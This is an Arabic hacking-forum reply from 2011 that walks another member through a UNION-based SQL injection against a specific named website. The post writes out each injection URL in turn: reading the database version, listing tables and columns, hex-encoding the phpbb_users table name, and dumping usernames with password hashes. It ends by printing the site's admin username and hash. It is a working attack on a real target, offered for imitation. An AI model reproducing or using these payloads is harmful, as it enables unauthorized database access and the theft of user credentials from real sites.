الموضوع: مساعدة
عرض مشاركة واحدة
قديم 01-23-2011, 01:35 PM   رقم المشاركة : 19 (permalink)
معلومات العضو
خالد سعودي
 
الصورة الرمزية خالد سعودي
 

 

 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة hacker2020
لك من احلاة تقيم بس أريد شرح كامل اوك وشكرا على المجهود الجيد دة

خالد سعودي

ولايهمك ياغالي
ولكن تابع الدورة اوكي
يالله نبدا
بسم الله الرحمن الرحيم
من اصدارالقاعدة


كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,version(),3,4,5+from+information_schema.columns-- 
بعدين نضع الامر هذا في مكان اصدار القاعدةversion()
كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns-- 
تمام باقي علينا لباسبودWhere+column_name+LIKE باس مشفرة من فيرفوكس
الظاهر انك تعرف كيف تجيبه
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
تلاحظ ان في الحقنه موجودGroup_ وهي تعرض الجميع لي في الجدوال
وطلع لك جميع لي في الجدوال وتبحث فيهم واحد واحد خينا ناخذ واحد منهو مثل phpbb_users
نشفيرها الموقع هذا وهو من الاساسيات
كود PHP:
http://www.waraxe.us/sql-char-encoder.html 
ممكن انك تعرف الموقع كيف يستخدام اذكانت ماتعرف قولي واحسن شي انك التابع الدورة sql في المنتدي وتركز فيها
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+table_name=0x70687062625f7573657273-- 
طلعتلك الستا تجرب فيهم علما user_id عضو مافي فائدة منه تبحث عن الباسورد او اليوز نيم من هذا قبيل
خلينا ناخذ واحد منهم username+user_password

يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(username,0x3a,user_password),3,4,5+from+phpbb_users-- 
admin:61b19b269cc521c8e15bbadb4dfe49a7
انا حولت فك الباس ولكن ما فك معي
:a14: والله طلع من الاختبارات وكتبت الموضوع وانااسف على التاخير يا غالي
في النهاية تتركك في فمان الرحمن ولكن كم اقولك تابع الدورة في المنتدي وركز عليه
تقييم

التعديل الأخير تم بواسطة خالد سعودي ; 01-23-2011 الساعة 01:42 PM.

   

رد مع اقتباس